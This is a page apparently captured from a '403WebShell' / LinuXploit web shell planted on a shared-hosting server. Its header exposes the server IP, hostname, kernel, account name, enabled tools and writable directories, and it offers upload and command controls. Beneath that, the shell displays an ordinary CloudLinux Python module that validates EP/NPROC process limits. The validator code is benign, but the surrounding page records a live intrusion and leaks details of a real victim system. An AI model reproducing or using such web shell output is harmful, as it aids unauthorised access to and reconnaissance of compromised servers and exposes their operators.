Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.224.57.25
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/cllimits_validator/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/cllimits_validator/ep_nproc_validator.py
# coding: utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from typing import Dict, Optional, Tuple, Union  # NOQA

from cllimitslib_v2 import LimitsDataStorage, DEFAULTS  # NOQA
from cllimitslib_v2.lve_storage import (
    Package, User, Reseller, OWN_SOURCE, RESELLER_SOURCE,  # NOQA
    PACKAGE_SOURCE, GLOBAL_SOURCE
)

from .base import BaseValidator, ENTITY_USER, ENTITY_PACKAGE, ENTITY_RESELLER, ENTITY_DEFAULTS


class EpNprocValidator(BaseValidator):

    def __init__(self, _limits_data_storage=None):
        # type: (LimitsDataStorage) -> None
        """
        Initialise the base validator and the EP/NPROC gap setting.

        :param _limits_data_storage: optional storage object, forwarded
            unchanged to the parent class constructor
        """
        super().__init__(_limits_data_storage=_limits_data_storage)

        # Minimum difference between the NPROC limit and the EP limit
        # needed for normal server work (see LU-919).
        self.diff_nproc_and_ep = 15

    @property
    def message_dict(self):
        # type: () -> Dict

        common_msg = (
            f'NPROC limit must be greater than EP + {self.diff_nproc_and_ep} limit, because '
            'number of processes and threads within LVE includes '
            'also Apache processes/threads, SSH sessions and etc, '
            'which enter into LVE.'
        )

        message_dict = dict(self._message_dict)
        message_dict['common_msg'] = common_msg
        return message_dict

    def _ep_and_nproc_is_valid(self, ep, nproc):
        # type: (int, int) -> bool
        if nproc == 0 or ep == 0:
            result = True
        else:
            result = nproc >= ep + self.diff_nproc_and_ep
        return result

    def _validate_nproc_and_ep_for_user(self, user, ep, nproc, has_input_limits):
        # type: (User, Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        Validate the EP/NPROC pair of a user and describe the affected entity.

        :param user: user whose limits are validated
        :param ep: EP value to validate; ``None`` means "use the value
            returned by the limits provider for this user"
        :param nproc: NPROC value to validate; ``None`` means "use the value
            returned by the limits provider for this user"
        :param has_input_limits: User has input limits, which will be set to it
        :return: tuple ``(is_valid, message_dict)``
        """

        message_dict = self.message_dict

        user_limits = self.limits_provider.get_user_limits(user)

        # Fall back to the stored value only when nothing was passed in.
        # A truthiness test (``ep or stored``) would also throw away an
        # explicit 0, which _ep_and_nproc_is_valid treats as always valid,
        # and validate the stored value instead of the requested one.
        ep = int(user_limits.ep.value if ep is None else ep)
        nproc = int(user_limits.nproc.value if nproc is None else nproc)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = user_limits.ep.source
        nproc_source = user_limits.nproc.source

        if has_input_limits:
            # Limits are being set directly on the user.
            message_dict['affected_entity'] = ENTITY_USER
            message_dict['entity_id'] = user.id
        elif OWN_SOURCE in (nproc_source, ep_source):
            # At least one limit is the user's own; mention the other one
            # if it is inherited.
            message_dict['affected_entity'] = ENTITY_USER
            message_dict['entity_id'] = user.id
            if ep_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'EP is inherited from {ep_source.capitalize()}'
                )
            elif nproc_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'NPROC is inherited from {nproc_source.capitalize()}'
                )
            else:
                message_dict['specific_msg'] = None
        elif nproc_source == ep_source:
            # Both limits are inherited from the same source, so that source
            # is reported as the affected entity.
            message_dict['affected_entity'] = ep_source
            if ep_source == PACKAGE_SOURCE:
                message_dict['entity_id'] = user.package.name
            elif ep_source == RESELLER_SOURCE:
                message_dict['entity_id'] = user.reseller.name
            elif ep_source == GLOBAL_SOURCE:
                message_dict['entity_id'] = ENTITY_DEFAULTS
        else:
            # Both limits are inherited, but from different sources.
            message_dict['affected_entity'] = ENTITY_USER
            message_dict['entity_id'] = user.id
            message_dict['specific_msg'] = (
                'Both validated limits (EP, NPROC) inheritance '
                f'from different sources: {ep_source} and {nproc_source}'
            )
        return result, message_dict

    def _validate_nproc_and_ep_for_package(self, package, ep, nproc, has_input_limits):
        # type: (Package, Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        Validate the EP/NPROC pair of a package and describe the affected entity.

        :param package: package whose limits are validated
        :param ep: EP value to validate; ``None`` means "use the value
            returned by the limits provider for this package"
        :param nproc: NPROC value to validate; ``None`` means "use the value
            returned by the limits provider for this package"
        :param has_input_limits: Package has input limits, which will be set to it
        :return: tuple ``(is_valid, message_dict)``
        """

        message_dict = self.message_dict

        package_limits = self.limits_provider.get_package_limits(package)

        # Fall back to the stored value only when nothing was passed in.
        # A truthiness test (``ep or stored``) would also throw away an
        # explicit 0, which _ep_and_nproc_is_valid treats as always valid,
        # and validate the stored value instead of the requested one.
        ep = int(package_limits.ep.value if ep is None else ep)
        nproc = int(package_limits.nproc.value if nproc is None else nproc)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = package_limits.ep.source
        nproc_source = package_limits.nproc.source

        if has_input_limits:
            # Limits are being set directly on the package.
            message_dict['affected_entity'] = ENTITY_PACKAGE
            message_dict['entity_id'] = package.name
        elif OWN_SOURCE in (nproc_source, ep_source):
            # At least one limit is the package's own; mention the other one
            # if it is inherited.
            message_dict['affected_entity'] = ENTITY_PACKAGE
            message_dict['entity_id'] = package.name
            if ep_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'EP is inherited from {ep_source.capitalize()}'
                )
            elif nproc_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'NPROC is inherited from {nproc_source.capitalize()}'
                )
            else:
                message_dict['specific_msg'] = None
        elif nproc_source == ep_source:
            # Both limits are inherited from the same source, so that source
            # is reported as the affected entity.
            message_dict['affected_entity'] = ep_source
            if ep_source == RESELLER_SOURCE:
                message_dict['entity_id'] = package.provider.name
            elif ep_source == GLOBAL_SOURCE:
                message_dict['entity_id'] = ENTITY_DEFAULTS
        else:
            # Both limits are inherited, but from different sources.
            message_dict['affected_entity'] = ENTITY_PACKAGE
            message_dict['entity_id'] = package.name
            message_dict['specific_msg'] = (
                'Both validated limits (EP, NPROC) inheritance '
                f'from different sources: {ep_source} and {nproc_source}'
            )
        return result, message_dict

    def _validate_nproc_and_ep_for_reseller(self, reseller, ep, nproc, has_input_limits):
        # type: (Reseller, Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        Validate the EP/NPROC pair of a reseller and describe the affected entity.

        :param reseller: reseller whose limits are validated
        :param ep: EP value to validate; ``None`` means "use the value
            returned by the limits provider for this reseller"
        :param nproc: NPROC value to validate; ``None`` means "use the value
            returned by the limits provider for this reseller"
        :param has_input_limits: Reseller has input limits, which will be set to it
        :return: tuple ``(is_valid, message_dict)``; the entity keys of
            ``message_dict`` are filled in only when limits are being set or
            at least one of the two limits is the reseller's own
        """

        message_dict = self.message_dict

        reseller_limits = self.limits_provider.get_reseller_limits(reseller)

        # Fall back to the stored value only when nothing was passed in.
        # A truthiness test (``ep or stored``) would also throw away an
        # explicit 0, which _ep_and_nproc_is_valid treats as always valid,
        # and validate the stored value instead of the requested one.
        ep = int(reseller_limits.ep.value if ep is None else ep)
        nproc = int(reseller_limits.nproc.value if nproc is None else nproc)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = reseller_limits.ep.source
        nproc_source = reseller_limits.nproc.source

        if has_input_limits:
            # Limits are being set directly on the reseller.
            message_dict['affected_entity'] = ENTITY_RESELLER
            message_dict['entity_id'] = reseller.name
        elif OWN_SOURCE in (nproc_source, ep_source):
            # At least one limit is the reseller's own; mention the other one
            # if it is inherited.
            message_dict['affected_entity'] = ENTITY_RESELLER
            message_dict['entity_id'] = reseller.name
            if ep_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'EP is inherited from {ep_source.capitalize()}'
                )
            elif nproc_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'NPROC is inherited from {nproc_source.capitalize()}'
                )
            else:
                message_dict['specific_msg'] = None

        return result, message_dict

    def _validate_nproc_and_ep_for_defaults(self, reseller, ep, nproc, has_input_limits):
        # type: (Union[Reseller, DEFAULTS], Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        Validate the EP/NPROC pair of default limits and describe the affected entity.

        :param reseller: a ``Reseller`` (its defaults are validated) or the
            ``DEFAULTS`` marker
        :param ep: EP value to validate; ``None`` means "use the value
            returned by the limits provider for these defaults"
        :param nproc: NPROC value to validate; ``None`` means "use the value
            returned by the limits provider for these defaults"
        :param has_input_limits: Defaults have input limits, which will be set to them
        :return: tuple ``(is_valid, message_dict)``; the entity keys of
            ``message_dict`` are filled in only when limits are being set or
            at least one of the two limits is an own limit
        """

        message_dict = self.message_dict

        # Reseller defaults are identified by the reseller name, anything
        # else by the DEFAULTS marker.
        id_entity = reseller.name if isinstance(reseller, Reseller) else DEFAULTS

        default_limits = self.limits_provider.get_defaults_limits(reseller)

        # Fall back to the stored value only when nothing was passed in.
        # A truthiness test (``ep or stored``) would also throw away an
        # explicit 0, which _ep_and_nproc_is_valid treats as always valid,
        # and validate the stored value instead of the requested one.
        ep = int(default_limits.ep.value if ep is None else ep)
        nproc = int(default_limits.nproc.value if nproc is None else nproc)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = default_limits.ep.source
        nproc_source = default_limits.nproc.source

        if has_input_limits:
            # Limits are being set directly on the defaults.
            message_dict['affected_entity'] = ENTITY_DEFAULTS
            message_dict['entity_id'] = id_entity
        elif OWN_SOURCE in (nproc_source, ep_source):
            # At least one limit is an own limit; mention the other one
            # if it is inherited.
            message_dict['affected_entity'] = ENTITY_DEFAULTS
            message_dict['entity_id'] = id_entity
            if ep_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'EP is inherited from {ep_source.capitalize()}'
                )
            elif nproc_source != OWN_SOURCE:
                message_dict['specific_msg'] = (
                    f'NPROC is inherited from {nproc_source.capitalize()}'
                )
            else:
                message_dict['specific_msg'] = None

        return result, message_dict

    def _validate(self, validated_entity, ep, nproc, has_input_limits, check_reseller_defaults=False):
        # type: (Union[User, Reseller, Package, None], Optional[int], Optional[int], bool, bool) -> Tuple[bool, Dict]
        """
        Route the entity to the EP/NPROC check that matches its type.

        :param validated_entity: ``User``, ``Package``, ``Reseller`` or the
            ``DEFAULTS`` marker; anything else is reported as valid
        :param ep: EP value handed to the selected check
        :param nproc: NPROC value handed to the selected check
        :param has_input_limits: handed to the selected check unchanged
        :param check_reseller_defaults: for a ``Reseller``, validate its
            default limits instead of its own limits
        :return: tuple ``(is_valid, message_dict)``
        """
        fallback_messages = self.message_dict

        if isinstance(validated_entity, User):
            checker = self._validate_nproc_and_ep_for_user
        elif isinstance(validated_entity, Package):
            checker = self._validate_nproc_and_ep_for_package
        elif isinstance(validated_entity, Reseller):
            if check_reseller_defaults:
                # we validate reseller defaults
                checker = self._validate_nproc_and_ep_for_defaults
            else:
                # we validate reseller limits
                checker = self._validate_nproc_and_ep_for_reseller
        elif validated_entity == DEFAULTS:
            # we validate default limits
            checker = self._validate_nproc_and_ep_for_defaults
        else:
            # Unknown entity kind: nothing to check.
            return True, fallback_messages

        outcome, messages = checker(validated_entity, ep, nproc, has_input_limits)
        return outcome, messages

    def validate_existing_limits(self, validated_entity, check_reseller_defaults=False):
        # type: (Union[User, Reseller, Package, None], bool) -> Tuple[bool, Dict]
        """
        Validate limits which already are recorded in ve.cfg

        No EP/NPROC values are supplied here, so the per-entity checks use
        the values returned by the limits provider.

        :param validated_entity: entity whose current limits are checked
        :param check_reseller_defaults: for a ``Reseller``, check its default
            limits instead of its own limits
        :return: tuple ``(is_valid, message_dict)``
        """
        no_ep = None
        no_nproc = None
        return self._validate(validated_entity, no_ep, no_nproc, False, check_reseller_defaults)

    def validate_input_limits(self, validated_entity, input_limits, check_reseller_defaults=False):
        # type: (Union[User, Reseller, Package, None], Dict, bool) -> Tuple[bool, Dict]
        """
        Validate limits which we want to set
        """

        message_dict = self.message_dict

        nproc = input_limits.get('nproc', None)
        ep = input_limits.get('ep', None)
        # if input_limits has no ep and nproc we set has_settable_limits to None
        # It means nothing to validate
        has_input_limits = nproc is not None or ep is not None

        # We skip check if nproc is unlimited or input limits don't have ep and nproc values
        if nproc == 0 or not has_input_limits:
            result = True
        else:
            result, message_dict = self._validate(validated_entity, ep, nproc,
                                                  has_input_limits, check_reseller_defaults)

        return result, message_dict

Youez - 2016 - github.com/yon3zu
LinuXploit